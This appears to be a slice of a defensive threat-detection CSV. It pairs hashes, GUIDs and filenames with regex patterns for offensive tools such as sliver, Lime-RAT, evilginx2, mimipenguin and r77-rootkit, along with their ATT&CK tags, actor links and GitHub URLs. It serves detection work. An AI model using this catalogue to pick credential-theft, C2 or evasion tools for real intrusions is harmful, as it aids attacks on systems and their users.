"*AERTSW50ZXJuYWxzXHg4Nlx2Y3J1bnRpbWUxNDBfdGhyZWFkcy5kbGxQSwECFAAUAAAACAAnnY1YrbP4grERAAA9RQAADwAAAAAAAAAAAAAAAABk7yEARFNJbnRlcm5hbHMuY2F0UEsFBgAAAAAwADAAdRAAAEIBIgAAAA==*",".{0,1000}AERTSW50ZXJuYWxzXHg4Nlx2Y3J1bnRpbWUxNDBfdGhyZWFkcy5kbGxQSwECFAAUAAAACAAnnY1YrbP4grERAAA9RQAADwAAAAAAAAAAAAAAAABk7yEARFNJbnRlcm5hbHMuY2F0UEsFBgAAAAAwADAAdRAAAEIBIgAAAA\=\=.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","#base64","base64 rubeus","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","33602"
"*aes*83fb558645767abb199755eafb4fbc5167113da8ee69f13267388dc3adcdb088*",".{0,1000}aes.{0,1000}83fb558645767abb199755eafb4fbc5167113da8ee69f13267388dc3adcdb088.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","#filehash","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","33603"
"*AES_cryptor.py *",".{0,1000}AES_cryptor\.py\s.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","33604"
"*aes_enc_peass(peass_script)*",".{0,1000}aes_enc_peass\(peass_script\).{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33605"
"*AesEncryptor.py*",".{0,1000}AesEncryptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","33606"
"*af0620ad11ab2327d91c65e3d5feabe08e2bc7bbc11099322f5eb4c7f302c4ba*",".{0,1000}af0620ad11ab2327d91c65e3d5feabe08e2bc7bbc11099322f5eb4c7f302c4ba.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33608"
"*AF0885E4-9E3B-49CA-9F13-0F869E8BF89D*",".{0,1000}AF0885E4\-9E3B\-49CA\-9F13\-0F869E8BF89D.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33609"
"*AF10B9C3-7969-4971-BD7A-5C50D8D2547F*",".{0,1000}AF10B9C3\-7969\-4971\-BD7A\-5C50D8D2547F.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33611"
"*af11238c0d014ce83d4320d8b4a0b664b920dadebb2dcbffcaba067b2a1e61bd*",".{0,1000}af11238c0d014ce83d4320d8b4a0b664b920dadebb2dcbffcaba067b2a1e61bd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33612"
"*af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23*",".{0,1000}af125299039eca4bdc0b43b65aec3fb54c62a48b6f8bcf1bb07a0a1e95241c23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33613"
"*af190cf0778fc031a0db2eb2e36aaa0a09dea5495ce8a50d6e3eee439db3dc7a*",".{0,1000}af190cf0778fc031a0db2eb2e36aaa0a09dea5495ce8a50d6e3eee439db3dc7a.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","33615"
"*AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB*",".{0,1000}AF2D318C\-2C5A\-4C9D\-BE4C\-AA5B3E8037DB.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#GUIDproject","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","33619"
"*af2d9062b7788fc47385d8c6c645dfa0*",".{0,1000}af2d9062b7788fc47385d8c6c645dfa0.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","33620"
"*af2f2426e9f2614350859b5bc05cf72138e5a5fbc8dc06f22c12b929deaf340a*",".{0,1000}af2f2426e9f2614350859b5bc05cf72138e5a5fbc8dc06f22c12b929deaf340a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33621"
"*af37338c3451aa6794a1fb6111c22cc9931d3a0d97cd9aa8326702d8ac87ac07*",".{0,1000}af37338c3451aa6794a1fb6111c22cc9931d3a0d97cd9aa8326702d8ac87ac07.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","33623"
"*af42a17d428c8e9d6f4a6d3393ec268f4d12bbfd01a897d87275482a45c847e9*",".{0,1000}af42a17d428c8e9d6f4a6d3393ec268f4d12bbfd01a897d87275482a45c847e9.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","33624"
"*af47f458fabf670417c688d3b25cdbd4ff7a4f34530b2af273a578e2a95ae697*",".{0,1000}af47f458fabf670417c688d3b25cdbd4ff7a4f34530b2af273a578e2a95ae697.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33626"
"*af5953a63d8030e45758873c4fc3deb688e800caca48b5dcaf3fc7fca6aa9ade*",".{0,1000}af5953a63d8030e45758873c4fc3deb688e800caca48b5dcaf3fc7fca6aa9ade.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33627"
"*af5c3a5f68323ac68b258dae37c20e48f594118d08479f92a78bd54d26debd9a*",".{0,1000}af5c3a5f68323ac68b258dae37c20e48f594118d08479f92a78bd54d26debd9a.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33630"
"*af61365c5ecb82162a79a74e76ab1711e8f85c4fcdcd9b7fee76e8e590050d53*",".{0,1000}af61365c5ecb82162a79a74e76ab1711e8f85c4fcdcd9b7fee76e8e590050d53.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33631"
"*af6678b4085b9c309c3c6f2977426aa104f796b083572d67cd1a71b8076af28d*",".{0,1000}af6678b4085b9c309c3c6f2977426aa104f796b083572d67cd1a71b8076af28d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33632"
"*af6d177df40fcf715f752557c9fd2483a5e194c1c468625a76a4862632db5cb6*",".{0,1000}af6d177df40fcf715f752557c9fd2483a5e194c1c468625a76a4862632db5cb6.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#filehash","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","33633"
"*af719967446404b4dde33dd813806650b52c51e89d4752995d507b5ba1d1b649*",".{0,1000}af719967446404b4dde33dd813806650b52c51e89d4752995d507b5ba1d1b649.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","33635"
"*af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d*",".{0,1000}af751c690671ffc0da6380ef94a25df3dfc5911c448319f7f6b90df55cca7b7d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33636"
"*af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df*",".{0,1000}af763332f70cf0137ebcb1d237e55a00c6fc0698982fec44fb012db4cb1be5df.{0,1000}","offensive_tool_keyword","mimipenguin","A tool to dump the login password from the current linux user","T1003.007","TA0006 - TA0002 ","N/A","TeamTNT","Credential Access","https://github.com/huntergregal/mimipenguin","1","0","#filehash #linux","N/A","10","10","3940","644","2023-05-17T13:20:46Z","2017-03-28T21:24:28Z","33638"
"*AF7F4404-C746-43EC-86EA-8405473C95C9*",".{0,1000}AF7F4404\-C746\-43EC\-86EA\-8405473C95C9.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","33640"
"*af8f26e8a970e480790b6c09289d3ab4a2dbf6097b3ac5dac323ac9ea433531a*",".{0,1000}af8f26e8a970e480790b6c09289d3ab4a2dbf6097b3ac5dac323ac9ea433531a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33643"
"*af91c925c3a6ba14dea50a5d24593c48cc02e7bfc23b7a02eaf59dd55c3ae6cd*",".{0,1000}af91c925c3a6ba14dea50a5d24593c48cc02e7bfc23b7a02eaf59dd55c3ae6cd.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","#filehash","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","33644"
"*AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9*",".{0,1000}AF9C62A1\-F8D2\-4BE0\-B019\-0A7873E81EA9.{0,1000}","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tool","https://github.com/med0x2e/GadgetToJScript","1","0","#GUIDproject","N/A","10","10","942","168","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z","33645"
"*afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25*",".{0,1000}afabb213499036eb1aa379aa91c62bedb75f085dd3962b90638a65bea1fc5d25.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33648"
"*afac742aefab4af6b076dc05c93eae9d329d0d89d97a098a48217013ee8761e6*",".{0,1000}afac742aefab4af6b076dc05c93eae9d329d0d89d97a098a48217013ee8761e6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33649"
"*afb4d1a05a4b0b47692debfbe57946caa4bfaa2ba18b121bcfe143bf567186be*",".{0,1000}afb4d1a05a4b0b47692debfbe57946caa4bfaa2ba18b121bcfe143bf567186be.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","33650"
"*afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd*",".{0,1000}afb55dc8b4bcff758082efde93e5ca9c2a6a725b16a4c82e7675393bf46fecfd.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","33651"
"*AFB848D0-68F8-42D1-A1C8-99DFBE034FCF*",".{0,1000}AFB848D0\-68F8\-42D1\-A1C8\-99DFBE034FCF.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","33653"
"*afbb31d1093a2da538a7179a04ccb87bebdc041734314f027ff0c3d2bec04cfe*",".{0,1000}afbb31d1093a2da538a7179a04ccb87bebdc041734314f027ff0c3d2bec04cfe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33654"
"*afbcbjpbpfadlkmhmclhkeeodmamcflc*",".{0,1000}afbcbjpbpfadlkmhmclhkeeodmamcflc.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33655"
"*afc4be6010ca93ce9fbd373bb9795be61db66b236201236d7193934970926b6c*",".{0,1000}afc4be6010ca93ce9fbd373bb9795be61db66b236201236d7193934970926b6c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33657"
"*afca48a465dd8ee9d44677c4ebb9d71fc66adae3686dbff6b3eb139ef2306f7a*",".{0,1000}afca48a465dd8ee9d44677c4ebb9d71fc66adae3686dbff6b3eb139ef2306f7a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33659"
"*afd28d12d55e823076544802e23776a6150aa3095f8c9b5904cf35af8d258186*",".{0,1000}afd28d12d55e823076544802e23776a6150aa3095f8c9b5904cf35af8d258186.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","33660"
"*afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd*",".{0,1000}afd2db12ce75a9ed350e7c04ab79ae018de33f9b994a7347e2a530755081d2cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33661"
"*afd6ae4a43475e4583b50a168a89eb3f3ff3916fa2a9933c41581bc695a10796*",".{0,1000}afd6ae4a43475e4583b50a168a89eb3f3ff3916fa2a9933c41581bc695a10796.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33662"
"*afd6b1709549377d5dc7d34f2ed69722f563a0c265dad53d5a7a185ac1b7fd72*",".{0,1000}afd6b1709549377d5dc7d34f2ed69722f563a0c265dad53d5a7a185ac1b7fd72.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33663"
"*afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d*",".{0,1000}afd8bd5606cb0e36a8be84a629f7fda4b4ada793ddf9eb758d9259e529f9a76d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33664"
"*afda444341d9478be17dbb1e4fcee7b7944920e26b83a18978be10d8ecfedf76*",".{0,1000}afda444341d9478be17dbb1e4fcee7b7944920e26b83a18978be10d8ecfedf76.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","33665"
"*afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8*",".{0,1000}afe0e8f105e3f0e7eed041cf68a15594aa33a946d27c63adb18b8200ca98e5e8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33666"
"*afe36c9c3160a5a6ce2a5df3cc7f61099bcfd71f2e9733a2dcf95410f5e63925*",".{0,1000}afe36c9c3160a5a6ce2a5df3cc7f61099bcfd71f2e9733a2dcf95410f5e63925.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33667"
"*afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d*",".{0,1000}afeb282bb991650ada2e73c65ed5a1770e1a3bc415b2e1e07462b854c077c93d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33669"
"*afebad2b0d57634ed88fbadfa746b2ca9022622b77e33d49a300b62e9821e543*",".{0,1000}afebad2b0d57634ed88fbadfa746b2ca9022622b77e33d49a300b62e9821e543.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33670"
